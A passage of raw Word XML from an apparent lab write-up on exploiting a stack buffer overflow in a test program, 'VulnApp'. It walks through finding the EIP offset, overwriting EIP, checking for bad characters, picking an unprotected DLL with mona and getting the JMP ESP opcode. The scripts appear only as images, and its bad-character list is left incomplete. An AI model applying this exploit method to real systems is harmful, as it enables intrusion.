    <w:p w14:paraId="41C2837E" w14:textId="77777777" w:rsidR="00872054" w:rsidRDefault="00C3602D" w:rsidP="007D0171">
      <w:r>
        <w:t>For this application, the EIP value in the debugger is 386F4337. Using a second ruby script from Metasploit called pattern_offset.rb on this EIP value</w:t>
      </w:r>
      <w:r w:rsidR="00872054">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">will search for a pattern </w:t>
      </w:r>
      <w:r w:rsidR="004D6526">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>within the generated 2500 characters from the pattern_create script [Figure 2.1]</w:t>
      </w:r>
      <w:r w:rsidR="004D6526">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that matches the EIP value 386F4337</w:t>
      </w:r>
      <w:r w:rsidR="004D6526">
        <w:t xml:space="preserve">, showing us the exact point the EIP register begins. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27022A02" w14:textId="77777777" w:rsidR="00872054" w:rsidRDefault="00872054" w:rsidP="007D0171"/>
    <w:p w14:paraId="0FDC6BD0" w14:textId="32F4A7A2" w:rsidR="007D0171" w:rsidRDefault="004D6526" w:rsidP="007D0171">
      <w:r>
        <w:t>In this case it found an offset of 2003 bytes</w:t>
      </w:r>
      <w:r w:rsidR="00872054">
        <w:t xml:space="preserve"> [Figure 2.4]</w:t>
      </w:r>
      <w:r>
        <w:t>. This is critical as Adelaja now knows there are 2003 bytes right before the EIP, with the EIP itself being 4 bytes long</w:t>
      </w:r>
      <w:r w:rsidR="00872054">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00872054">
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ith this knowledge, those 4 specific bytes can now be </w:t>
      </w:r>
      <w:r w:rsidR="00872054">
        <w:t>overridden to gain control of the EIP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5219E151" w14:textId="17BD64AC" w:rsidR="004D6526" w:rsidRDefault="004D6526" w:rsidP="007D0171">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57CBE20A" wp14:editId="215E03FA">
            <wp:extent cx="5943600" cy="1143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p w14:paraId="34AECE35" w14:textId="6F6DEEEB" w:rsidR="00254D5A" w:rsidRDefault="00254D5A" w:rsidP="00254D5A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Identifying the Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18715C57" w14:textId="4FF02BA1" w:rsidR="004D6526" w:rsidRDefault="004D6526" w:rsidP="007D0171"/>
    <w:p w14:paraId="4BC697E7" w14:textId="1CBE5FA6" w:rsidR="004D6526" w:rsidRDefault="004D6526" w:rsidP="007D0171"/>
    <w:p w14:paraId="4E6817E7" w14:textId="0A69E664" w:rsidR="004D6526" w:rsidRDefault="004D6526" w:rsidP="007D0171"/>
    <w:p w14:paraId="1BB84C44" w14:textId="0852A08D" w:rsidR="004D6526" w:rsidRDefault="004D6526" w:rsidP="007D0171"/>
    <w:p w14:paraId="340B3F61" w14:textId="77777777" w:rsidR="00872054" w:rsidRDefault="00872054" w:rsidP="007D0171"/>
    <w:p w14:paraId="2787EDDD" w14:textId="2E8B4508" w:rsidR="004D6526" w:rsidRDefault="004D6526" w:rsidP="007D0171">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>3.Overwriting and Controlling the EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6591BAB4" w14:textId="7A70966E" w:rsidR="00254D5A" w:rsidRDefault="00872054" w:rsidP="007D0171">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254D5A">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>To gain control of the EIP, another python script is run to send a custom buffer to the VulnApp application. The script below [Figure 3.1] will be using a new variable shellcode which is assigned a string of 2003 character A’s (2003 as this is the number of bytes before the EIP) plus 4 character B’s(To clearly define</w:t>
      </w:r>
      <w:r w:rsidR="00254D5A" w:rsidRPr="00254D5A">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the EIP’s 4 bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222CC942" w14:textId="01FD140C" w:rsidR="00254D5A" w:rsidRDefault="00254D5A" w:rsidP="007D0171">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64F6B226" wp14:editId="373FAAF1">
            <wp:extent cx="5943600" cy="3141980"/>
            <wp:effectExtent l="0" t="0" r="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14:paraId="242CAD05" w14:textId="46231CE7" w:rsidR="00254D5A" w:rsidRDefault="00254D5A" w:rsidP="00254D5A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shellScript.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FFD6C1" w14:textId="69C04307" w:rsidR="00254D5A" w:rsidRDefault="00254D5A" w:rsidP="007D0171">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254D5A">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>When the script is run and the VulnApp application crashes, looking at the registers on immunity shows the TRUN Command and the A’s, on the EBP the A’s in hex format 414141 and on the EIP the B’s in hex format 424242 [Figure 3.2]. The EIP is overwritten and can be used to point to malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD86579" w14:textId="52026282" w:rsidR="00492C33" w:rsidRPr="00254D5A" w:rsidRDefault="00492C33" w:rsidP="007D0171">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="299C9AFF" wp14:editId="339053A5">
            <wp:extent cx="5846660" cy="3295650"/>
            <wp:effectExtent l="0" t="0" r="1905"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52155" cy="3355115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA3811E" w14:textId="00944012" w:rsidR="00492C33" w:rsidRDefault="00492C33" w:rsidP="00492C33">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2:Overwritten EIP Register on Immunity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1890C677" w14:textId="3ADB03E7" w:rsidR="00872054" w:rsidRDefault="00872054" w:rsidP="007D0171">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="545E1BCD" w14:textId="7EC18CE9" w:rsidR="004D6526" w:rsidRDefault="004D6526" w:rsidP="007D0171"/>
    <w:p w14:paraId="6247C80B" w14:textId="526AAD5B" w:rsidR="00254D5A" w:rsidRDefault="00254D5A" w:rsidP="007D0171">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>4. Identifying Bad Characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61896C73" w14:textId="27D8FE07" w:rsidR="00492C33" w:rsidRPr="00680902" w:rsidRDefault="00492C33" w:rsidP="007D0171">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00680902">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">When generating shellcodes, it is necessary to find and remove the possibility of bad characters interfering with the shellcode. </w:t>
      </w:r>
      <w:r w:rsidR="00680902">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">These </w:t>
      </w:r>
      <w:r w:rsidRPr="00680902">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>character</w:t>
      </w:r>
      <w:r w:rsidR="007D2FD3">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>s are used by the VulnApp application so if passed to the program through the shellcode, VulnApp will consider it as something else</w:t>
      </w:r>
      <w:r w:rsidRPr="00680902">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and the shellcode will not run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B146271" w14:textId="54467F2D" w:rsidR="00492C33" w:rsidRPr="00680902" w:rsidRDefault="007D2FD3" w:rsidP="007D0171">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00492C33" w:rsidRPr="00680902">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>y running all the hex characters through the VulnApp program and see</w:t>
      </w:r>
      <w:r w:rsidR="00680902" w:rsidRPr="00680902">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>ing the effects on the program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>, these bad characters can be determined</w:t>
      </w:r>
      <w:r w:rsidR="00680902" w:rsidRPr="00680902">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68388100" w14:textId="67945091" w:rsidR="00680902" w:rsidRDefault="00680902" w:rsidP="007D0171">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="073797BC" wp14:editId="25807CA5">
            <wp:extent cx="5514975" cy="3174646"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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69587" cy="3206083"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B13DE00" w14:textId="37FE9114" w:rsidR="00680902" w:rsidRDefault="00680902" w:rsidP="00680902">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shellScript2.py to find Bad Characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197D7291" w14:textId="5E4A79E5" w:rsidR="00680902" w:rsidRDefault="00680902" w:rsidP="00680902">
      <w:r>
        <w:t xml:space="preserve">Running the above script with the null byte value included [Figure </w:t>
      </w:r>
      <w:r w:rsidR="007D2FD3">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.1] will send the payload with the bad characters. Below is the Hex dump after the application crashes</w:t>
      </w:r>
      <w:r w:rsidR="007D2FD3">
        <w:t xml:space="preserve"> [Figure 4.2] [Figure4.3]</w:t>
      </w:r>
      <w:r>
        <w:t>, any values missing or out of order will be a bad character and should be excluded from shellcode.</w:t>
      </w:r>
      <w:r w:rsidR="007D2FD3">
        <w:t xml:space="preserve"> In this case the only bad character is \x00</w:t>
      </w:r>
      <w:r w:rsidR="007F4713">
        <w:t>,\x,\x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404C90EF" w14:textId="62FA0176" w:rsidR="00680902" w:rsidRPr="00680902" w:rsidRDefault="00680902" w:rsidP="00680902">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3370106D" wp14:editId="6F45DE03">
            <wp:extent cx="5895975" cy="3052445"/>
            <wp:effectExtent l="0" t="0" r="952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5820" cy="3093782"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE3A5CA" w14:textId="399E414C" w:rsidR="00680902" w:rsidRDefault="00680902" w:rsidP="007D2FD3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="007D2FD3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hex dump after running bad character script with null byte included</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073BC9D1" w14:textId="04440455" w:rsidR="007D2FD3" w:rsidRDefault="007D2FD3" w:rsidP="007D2FD3">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="519DCAD5" wp14:editId="7BA1F55C">
            <wp:extent cx="5943600" cy="4051300"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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051300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6C1335" w14:textId="439027AA" w:rsidR="007D2FD3" w:rsidRDefault="007D2FD3" w:rsidP="007D2FD3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hex dump after running bad character script without null byte included</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306CEBBB" w14:textId="4B292D7C" w:rsidR="007D2FD3" w:rsidRDefault="007D2FD3" w:rsidP="007D2FD3">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329B106C" w14:textId="57AF5D0B" w:rsidR="007F4713" w:rsidRDefault="007F4713" w:rsidP="007D2FD3">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>5. Identifying The Right Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3103F6B8" w14:textId="56600532" w:rsidR="007F4713" w:rsidRDefault="007F4713" w:rsidP="007D2FD3">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F4713">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>To identify the right vulnerable module in the application’s library, another python script will be used to find a .dll file linked to VulnApp</w:t>
      </w:r>
      <w:r w:rsidR="00D47184">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F4713">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>that has no memory protections. The mona module is a tool that can be used with immunity debugger to achieve this. This module, as seen below, is already attached to the immunity debugger Py Commands folder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> [Figure 5.1]</w:t>
      </w:r>
      <w:r w:rsidRPr="007F4713">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9154D2" w14:textId="2FDBEC5A" w:rsidR="007F4713" w:rsidRDefault="007F4713" w:rsidP="007D2FD3">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5571AB68" wp14:editId="66681AC3">
            <wp:extent cx="5676900" cy="303466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91002" cy="3042203"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007F4713">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CAE79D" w14:textId="2F6969B6" w:rsidR="007F4713" w:rsidRDefault="007F4713" w:rsidP="007F4713">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006D1BE2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006D1BE2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="006D1BE2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mona.py python script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2306F889" w14:textId="696DAD0C" w:rsidR="007F4713" w:rsidRDefault="006D1BE2" w:rsidP="007F4713">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">With Immunity running and the VulnApp.exe attaced and loaded and using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00907C61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>“!mona module”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> at the bottom of the debugger screen will display all the availaible dll’s. The essfunc.dll module with address is selected as it has all its memory protections set to false, is linked to vulnApp and has no return value[Figure 5.2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9787AA" w14:textId="17F98C39" w:rsidR="006D1BE2" w:rsidRDefault="006D1BE2" w:rsidP="007F4713">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B8531C9" wp14:editId="73DF2663">
            <wp:extent cx="5943600" cy="3056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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DB402B" w14:textId="33A54FDD" w:rsidR="006D1BE2" w:rsidRDefault="006D1BE2" w:rsidP="006D1BE2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mona modules on Immunity Debugger showing DLL’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D6B762" w14:textId="487B5155" w:rsidR="007F4713" w:rsidRDefault="007021F0" w:rsidP="007F4713">
      <w:r>
        <w:t>The jump command in assembly language is going to be used as a pointer to jump to the malicious code but the operation code equivalent of the command must be used. To do this the ruby script nasm_shell is used to convert the assembly language JMP ESP into hex FFE4 [Figure 5.3]</w:t>
      </w:r>
      <w:r w:rsidR="00907C61">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F02D6DB" w14:textId="3DEBFC00" w:rsidR="007021F0" w:rsidRDefault="007021F0" w:rsidP="007F4713">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F8BA7FF" wp14:editId="05F3598B">
            <wp:extent cx="5355235" cy="904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5613347" cy="948488"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCBB8EA" w14:textId="7BD613DD" w:rsidR="00907C61" w:rsidRDefault="00907C61" w:rsidP="00907C61">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E34B94">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
